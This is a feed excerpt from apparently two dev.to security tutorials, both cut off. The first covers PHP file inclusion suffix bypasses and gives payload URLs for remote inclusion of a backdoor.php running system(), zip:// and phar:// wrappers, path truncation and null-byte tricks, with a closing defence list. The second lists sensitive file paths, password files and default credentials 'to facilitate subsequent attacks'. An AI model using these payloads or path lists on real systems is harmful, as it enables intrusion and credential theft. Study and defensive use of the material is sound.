&lt;code&gt;%c0%ae%c0%ae/&lt;/code&gt; (Java: &lt;code&gt;%c0%ae&lt;/code&gt; → &lt;code&gt;\uC0AE&lt;/code&gt; → &lt;code&gt;.&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;..%c1%9c&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Bypassing a Fixed Suffix
&lt;/h3&gt;

&lt;p&gt;Test code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
    &lt;span class="nv"&gt;$file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$_GET&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'file'&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="k"&gt;include&lt;/span&gt; &lt;span class="nv"&gt;$file&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="s1"&gt;'/test/test.php'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Solution: URL Query and Fragment
&lt;/h4&gt;

&lt;p&gt;URL format: &lt;code&gt;protocol://hostname[:port]/path[;parameters][?query]#fragment&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;For RFI (&lt;code&gt;allow_url_fopen=On&lt;/code&gt;, &lt;code&gt;allow_url_include=On&lt;/code&gt;):&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Technique 1: Query (&lt;code&gt;?&lt;/code&gt;)&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;index.php?file&lt;span class="o"&gt;=&lt;/span&gt;http://remoteaddr/remoteinfo.txt?
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Included file becomes &lt;code&gt;http://remoteaddr/remoteinfo.txt?/test/test.php&lt;/code&gt; – the suffix is treated as a query.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Command execution / Trojan writing example:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;http://x.x.x.x/fileinclude2.php?file=http://x.x.x.x/backdoor.php?
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;where &lt;code&gt;backdoor.php&lt;/code&gt; contains &lt;code&gt;&amp;lt;?php system('whoami'); ?&amp;gt;&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq7impqvociy002tje8yy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq7impqvociy002tje8yy.png" alt=" " width="799" height="184"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Replace with a web‑shell writing payload to get a shell.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Technique 2: Fragment (&lt;code&gt;#&lt;/code&gt; or &lt;code&gt;%23&lt;/code&gt;)&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight perl"&gt;&lt;code&gt;&lt;span class="nb"&gt;index&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nv"&gt;php&lt;/span&gt;&lt;span class="p"&gt;?&lt;/span&gt;&lt;span class="nv"&gt;file&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;http:&lt;/span&gt;&lt;span class="sr"&gt;//&lt;/span&gt;&lt;span class="nv"&gt;remoteaddr&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="nv"&gt;remoteinfo&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nv"&gt;txt&lt;/span&gt;&lt;span class="o"&gt;%&lt;/span&gt;&lt;span class="mi"&gt;23&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Included file: &lt;code&gt;http://remoteaddr/remoteinfo.txt#/test/test.php&lt;/code&gt; – the suffix becomes a fragment. URL-encode &lt;code&gt;#&lt;/code&gt; as &lt;code&gt;%23&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Command execution example:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;http://x.x.x.x/fileinclude2.php?file=http://x.x.x.x/backdoor.php%23
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Difference between Windows and Linux:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Linux works as above.&lt;/li&gt;
&lt;li&gt;On Windows, both &lt;code&gt;?&lt;/code&gt; and &lt;code&gt;#&lt;/code&gt; (even unencoded) work; no special encoding needed.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwef59k8pmdosfr58zmug.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwef59k8pmdosfr58zmug.png" alt=" " width="800" height="156"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F23qod72s857mq0p4f57t.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F23qod72s857mq0p4f57t.png" alt=" " width="799" height="206"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Solution: Using Pseudo‑Protocols
&lt;/h4&gt;

&lt;p&gt;Test code with suffix:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
    &lt;span class="nv"&gt;$file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$_GET&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'file'&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="k"&gt;include&lt;/span&gt; &lt;span class="nv"&gt;$file&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="s1"&gt;'/test/test.php'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Technique 1: &lt;code&gt;zip://&lt;/code&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Construct a ZIP archive (e.g., &lt;code&gt;J0.zip&lt;/code&gt;) containing a file &lt;code&gt;J0/test.php&lt;/code&gt; (since the suffix appends &lt;code&gt;/test/test.php&lt;/code&gt;, we want the inner file to be named appropriately). Let the inner file be &lt;code&gt;J0&lt;/code&gt;? Actually, the include is &lt;code&gt;$file . '/test/test.php'&lt;/code&gt;. If we set &lt;code&gt;$file&lt;/code&gt; to &lt;code&gt;zip://path/to/archive.zip#inner&lt;/code&gt;, then the full path becomes &lt;code&gt;zip://.../archive.zip#inner/test/test.php&lt;/code&gt;. So the inner file should be &lt;code&gt;inner/test/test.php&lt;/code&gt;? Let's follow the example: they created &lt;code&gt;J0.zip&lt;/code&gt; with a file &lt;code&gt;J0&lt;/code&gt; (no extension) containing &lt;code&gt;&amp;lt;?php phpinfo(); ?&amp;gt;&lt;/code&gt;. Then they used &lt;code&gt;fileinclude2.php?file=zip://D:\phpStudy\PHPTutorial\WWW\J0.zip%23J0&lt;/code&gt;. The concatenated string becomes &lt;code&gt;zip://D:\phpStudy\PHPTutorial\WWW\J0.zip#J0/test/test.php&lt;/code&gt;. That works because the pseudo‑protocol treats everything after &lt;code&gt;#&lt;/code&gt; as the inner file path.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxobc11euk8b5auwk01mx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxobc11euk8b5auwk01mx.png" alt=" " width="800" height="320"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Test content:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2h0anwy0qirt9np6ypdb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2h0anwy0qirt9np6ypdb.png" alt=" " width="800" height="305"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Technique 2: &lt;code&gt;phar://&lt;/code&gt;&lt;/strong&gt; (requires PHP &amp;gt;= 5.3.4)&lt;/p&gt;

&lt;p&gt;Using the same ZIP archive. Absolute path:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cpp"&gt;&lt;code&gt;&lt;span class="n"&gt;fileinclude2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;php&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="n"&gt;file&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;phar&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;//D:\phpStudy\PHPTutorial\WWW\J0.zip\J0&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Concatenated: &lt;code&gt;phar://D:\phpStudy\PHPTutorial\WWW\J0.zip\J0/test/test.php&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flaeusq6rxw0wvynvd1jn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flaeusq6rxw0wvynvd1jn.png" alt=" " width="800" height="300"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Relative path:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cpp"&gt;&lt;code&gt;&lt;span class="n"&gt;fileinclude2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;php&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="n"&gt;file&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;phar&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;//J0.zip\J0&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbrlrholw3rn8efg0h4t8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbrlrholw3rn8efg0h4t8.png" alt=" " width="799" height="246"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note on Command Execution and Trojan Writing:&lt;/strong&gt; As with &lt;code&gt;zip://&lt;/code&gt; and &lt;code&gt;phar://&lt;/code&gt;.&lt;/p&gt;

&lt;h4&gt;
  
  
  Solution: Length Truncation
&lt;/h4&gt;

&lt;p&gt;PHP version &amp;lt; 5.2.8. Directory strings have maximum length (4096 bytes on Linux, 256 bytes on Windows). Repeating &lt;code&gt;./&lt;/code&gt; many times:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;index.php?file&lt;span class="o"&gt;=&lt;/span&gt;phpinfo.php././././... &lt;span class="o"&gt;(&lt;/span&gt;repeated&lt;span class="o"&gt;)&lt;/span&gt; ././
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When the maximum is reached, the suffix &lt;code&gt;/test/test.php&lt;/code&gt; is discarded.&lt;/p&gt;

&lt;p&gt;Example on Windows:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;fileinclude2.php?file&lt;span class="o"&gt;=&lt;/span&gt;phpinfo.php/./././... &lt;span class="o"&gt;(&lt;/span&gt;many repetitions&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6rd5q26rwwvtkea3ffr3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6rd5q26rwwvtkea3ffr3.png" alt=" " width="800" height="235"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Adding too many may exceed capacity:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmhq5zzn16hl9an9lqc0h.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmhq5zzn16hl9an9lqc0h.png" alt=" " width="800" height="244"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note on Command Execution and Trojan Writing:&lt;/strong&gt; Replace &lt;code&gt;&amp;lt;?php phpinfo();?&amp;gt;&lt;/code&gt; with the desired PHP code.&lt;/p&gt;

&lt;h4&gt;
  
  
  Solution: Null Byte Truncation (&lt;code&gt;%00&lt;/code&gt;)
&lt;/h4&gt;

&lt;p&gt;Principle: &lt;code&gt;chr(0)&lt;/code&gt; acts as a string terminator. Everything after &lt;code&gt;%00&lt;/code&gt; is ignored.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;magic_quotes_gpc = Off&lt;/code&gt; (if &lt;code&gt;On&lt;/code&gt;, &lt;code&gt;%00&lt;/code&gt; becomes &lt;code&gt;\0&lt;/code&gt; and is escaped)&lt;/li&gt;
&lt;li&gt;PHP version &amp;lt; 5.3.4
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight diff"&gt;&lt;code&gt;&lt;span class="gh"&gt;index.php?file=phpinfo.php%00
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqphvmgnnvvg6u5orva5l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqphvmgnnvvg6u5orva5l.png" alt=" " width="800" height="196"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note on Command Execution and Trojan Writing:&lt;/strong&gt; Replace &lt;code&gt;&amp;lt;?php phpinfo();?&amp;gt;&lt;/code&gt; with the desired PHP code.&lt;/p&gt;

&lt;h2&gt;
  
  
  Defence Measures
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Configure PHP's &lt;code&gt;open_basedir&lt;/code&gt; to restrict file access to specified directories. This will cause inclusion to fail for files outside the web directory.&lt;/li&gt;
&lt;li&gt;Manage file permissions carefully.&lt;/li&gt;
&lt;li&gt;Limit includable files via whitelisting or by setting a dedicated include directory.&lt;/li&gt;
&lt;li&gt;Filter dangerous characters: &lt;code&gt;.&lt;/code&gt; (dot), &lt;code&gt;/&lt;/code&gt; (forward slash), &lt;code&gt;\&lt;/code&gt; (backslash), and other special characters.&lt;/li&gt;
&lt;li&gt;Set &lt;code&gt;allow_url_fopen = Off&lt;/code&gt; and &lt;code&gt;allow_url_include = Off&lt;/code&gt;. Although many pseudo‑protocols still work, this reduces the attack surface.&lt;/li&gt;
&lt;li&gt;Avoid dynamic inclusion whenever possible.&lt;/li&gt;
&lt;/ol&gt;

</description>
      <category>php</category>
      <category>cybersecurity</category>
      <category>vulnerabilities</category>
      <category>file</category>
    </item>
    <item>
      <title>Windows and Linux Sensitive Directory Path Summary</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Sun, 07 Jun 2026 05:01:24 +0000</pubDate>
      <link>https://dev.to/excalibra/windows-and-linux-sensitive-directory-path-summary-3b1o</link>
      <guid>https://dev.to/excalibra/windows-and-linux-sensitive-directory-path-summary-3b1o</guid>
      <description>&lt;h1&gt;
  
  
  Windows and Linux Sensitive Directory Path Summary
&lt;/h1&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Abstract:&lt;/strong&gt; This article describes how to exploit file inclusion and arbitrary file download vulnerabilities. It provides file lookup commands for different operating systems, lists common configuration file names for Apache, MySQL, PHP, etc., and mentions sensitive files and information, such as probe pages, system files, and critical paths in content management systems (CMS). In addition, default paths for website building tools such as XAMPP and phpStudy are covered, along with relevant files for common CMS platforms.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  0x01 Basic Information
&lt;/h2&gt;

&lt;p&gt;When encountering vulnerabilities such as file inclusion or arbitrary file download, the information in this article can be utilised to facilitate subsequent attacks.&lt;/p&gt;

&lt;h2&gt;
  
  
  0x02 Configuration Files
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Finding Files
&lt;/h3&gt;

&lt;p&gt;If command execution is possible, use the lookup commands directly.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Linux-related commands:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Find a file&lt;/span&gt;
find / &lt;span class="nt"&gt;-name&lt;/span&gt; filename.ext

&lt;span class="c"&gt;# Search entire disk for files containing 'flag'&lt;/span&gt;
&lt;span class="nb"&gt;grep &lt;/span&gt;flag &lt;span class="nt"&gt;-r&lt;/span&gt; /
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Windows-related commands:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Search entire disk for a file; be sure to add an asterisk!&lt;/span&gt;
&lt;span class="k"&gt;for&lt;/span&gt; /r c:&lt;span class="se"&gt;\ &lt;/span&gt;%i &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;password.txt&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="k"&gt;do&lt;/span&gt; @echo %i
&lt;span class="k"&gt;for&lt;/span&gt; /r c:&lt;span class="se"&gt;\ &lt;/span&gt;%i &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;.ini&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="k"&gt;do&lt;/span&gt; @echo %i

&lt;span class="c"&gt;# Search drive C: for files containing the string 'password'; double quotes are required!&lt;/span&gt;
findstr /s /n &lt;span class="s2"&gt;"password"&lt;/span&gt; c:&lt;span class="se"&gt;\*&lt;/span&gt;

&lt;span class="c"&gt;# Check whether pwd.txt contains the string 'password'; double quotes are required!&lt;/span&gt;
find /N /I &lt;span class="s2"&gt;"password"&lt;/span&gt; pwd.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Common Configuration File Names
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Apache
httpd.conf

# MySQL
my.ini

# Virtual host configuration
httpd-vhosts.conf

# IIS
metabase.xml
applicationHost.config

# SSH
/etc/ssh/sshd_config

# Nginx
/etc/nginx/nginx.conf
/etc/nginx/sites-enabled/default

# PHP
php.ini

# WebLogic (read password)
./security/SerializedSystemIni.dat
./config/config.xml
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Apache
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Configuration file path&lt;/span&gt;
/etc/httpd/conf/httpd.conf

&lt;span class="c"&gt;# Default site path&lt;/span&gt;
/var/www/html/

&lt;span class="c"&gt;# Ubuntu configuration file&lt;/span&gt;
/etc/apache2/apache2.conf

&lt;span class="c"&gt;# Access log and error log&lt;/span&gt;
/private/var/log/apache2/error_log
/private/var/log/apache2/access_log
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  IIS
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Configuration file&lt;/span&gt;
web.config
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  MySQL
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Configuration file&lt;/span&gt;
/etc/my.cnf
/etc/mysql/my.cnf
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  phpMyAdmin
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Configuration file&lt;/span&gt;
config.inc.php

&lt;span class="c"&gt;# Default path&lt;/span&gt;
/var/www/phpmyadmin/config.inc.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  XAMPP Suite
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Related paths:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Website default path
xampp\htdocs

# Apache basic configuration
xampp\apache\conf\httpd.conf

# Apache SSL
xampp\apache\conf\ssl.conf

# Apache Perl (plugin only)
xampp\apache\conf\perl.conf

# Apache Tomcat (plugin only)
xampp\apache\conf\java.conf

# Apache Python (plugin only)
xampp\apache\conf\python.conf

# Virtual hosts
xampp/apache/conf/extra/httpd-vhosts.conf

# PHP
xampp\php\php.ini

# Database default path
xampp\mysql\data

# MySQL
xampp\mysql\bin\my.ini

# phpMyAdmin
xampp\phpMyAdmin\config.inc.php

# FileZilla FTP server
xampp\FileZilla

# FTP/FileZilla Server.xml
Mercury

# Mercury mail server basic configuration
xampp\MercuryMail\MERCURY.INI

# Sendmail
xampp\sendmail\sendmail.ini
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Default passwords:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# MySQL
User: root   Password: (empty)

# FileZilla FTP
User: newuser   Password: wampp
User: anonymous   Password: some@mail.net

# Mercury
Postmaster: postmaster (postmaster@localhost)
Administrator: Admin (admin@localhost)
TestUser: newuser   Password: wampp

# WEBDAV
User: wampp   Password: xampp
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  phpStudy Suite
&lt;/h3&gt;

&lt;p&gt;Earlier versions of the phpStudy suite were reported to be problematic, with issues such as port conflicts and poor database management. However, when tested again on Windows (as of August 2019), these problems were no longer observed, reflecting the rapid evolution of technology and product updates.&lt;/p&gt;

&lt;p&gt;There is also a Pro version, so the paths have changed accordingly. This summary takes the Pro version as an example; for the standard version, simply remove 'Pro'.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Related paths:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Root directory
phpstudy\WWW
phpstudy_pro\WWW

# phpMyAdmin
phpstudy_pro\WWW\phpMyAdmin4.8.5

# PHP: In the Pro version, plugins are displayed as extensions.
phpstudy_pro\Extensions\php\php7.3.4nts\php.ini
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  0x03 Sensitive Files
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Probe Information
&lt;/h3&gt;

&lt;p&gt;When using XAMPP/LAMPP/phpStudy/PHPnow, some probe pages may be left behind, revealing useful information, such as &lt;code&gt;Document_Root&lt;/code&gt; (representing the website root directory) and &lt;code&gt;session.save_path&lt;/code&gt; (storing session information).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;1.php
l.php
p.php
probe.php
test.php
info.php
phpinfo.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Windows
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# View system version&lt;/span&gt;
c:&lt;span class="se"&gt;\b&lt;/span&gt;oot.ini

&lt;span class="c"&gt;# IIS configuration file&lt;/span&gt;
c:&lt;span class="se"&gt;\w&lt;/span&gt;indows&lt;span class="se"&gt;\s&lt;/span&gt;ystem32&lt;span class="se"&gt;\i&lt;/span&gt;netsrv&lt;span class="se"&gt;\M&lt;/span&gt;etaBase.xml

&lt;span class="c"&gt;# Stores the initial installation password for Windows&lt;/span&gt;
c:&lt;span class="se"&gt;\w&lt;/span&gt;indows&lt;span class="se"&gt;\r&lt;/span&gt;epair&lt;span class="se"&gt;\s&lt;/span&gt;am

&lt;span class="c"&gt;# MySQL configuration&lt;/span&gt;
